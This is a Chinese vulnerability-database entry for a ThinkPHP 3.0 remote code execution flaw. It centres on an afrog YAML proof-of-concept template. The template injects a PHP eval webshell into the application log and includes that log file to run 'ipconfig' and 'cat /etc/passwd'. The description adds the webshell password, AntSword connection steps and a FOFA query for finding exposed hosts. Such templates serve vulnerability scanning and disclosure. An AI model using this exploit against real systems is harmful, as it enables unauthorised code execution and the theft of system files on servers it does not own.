thinkphp-3-0-log-rce: Thinkphp 3.0 log 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: Thinkphp 3.0 | POC: 已公开

漏洞描述

ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。 蚁剑连接,得到一个webshell,密码为1(日志文件名需改为今天的日期) debug模式关闭:http://x.x.x.x:23707/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_04_13.log debug模式开启:http://x.x.x.x:23707/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/22_04_13.log fofa-query: "thinkphp"

PoC代码[已公开]

id: thinkphp-3-0-log-rce

info:
  name: Thinkphp 3.0 log 远程命令执行漏洞
  author: daffainfo
  severity: critical
  verified: false
  description: |
         ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。
         蚁剑连接,得到一个webshell,密码为1(日志文件名需改为今天的日期)
         debug模式关闭:http://x.x.x.x:23707/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_04_13.log
         debug模式开启:http://x.x.x.x:23707/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/22_04_13.log
         fofa-query: "thinkphp"
  reference:
    - https://mp.weixin.qq.com/s/yuaJfZwr4ksstsW8nENoNA
    
set:
  logfilename: shortyear(0) + "_" + month(0) + "_" + day(0) + ".log"
rules:
  r0:
    request:
      method: GET
      path: /index.php?m=1
    expression: response.status == 404 && response.body.bcontains(b'ThinkPHP</a><sup>3.2.3</sup>')
  r1:
    request:
      method: GET
      path: /index.php?m=--><?=${@print(eval($_POST[1]))}?>
      headers:
        Cookie: PHPSESSID=t6drgq5cgde4caprfqv30joda0
        DNT: 1
    expression: response.status == 404 && response.body.bcontains(b'系统发生错误')  && response.headers["content-type"].contains("text/html")
  r2:
    request:
      method: POST
      path: /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/{{logfilename}}
      body: "1=ipconfig"
    expression: response.status == 200 && response.body.bcontains(b'Windows IP')
  r3:
    request:
      method: POST
      path: /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/{{logfilename}}
      body: "1=ipconfig"
    expression: response.status == 200 && response.body.bcontains(b'Windows IP')
  r22:
      request:
        method: POST
        path: /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/{{logfilename}}
        body: "1=cat+/etc/passwd"
      expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  r33:
    request:
      method: POST
      path: /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/{{logfilename}}
      body: "1=cat+/etc/passwd"
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: (r0() && r1() && r2()) || (r0() && r1() && r3()) || (r0() && r1() && r22()) || (r0() && r1() && r33())
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp-3-0-log-rce.yaml

相关漏洞推荐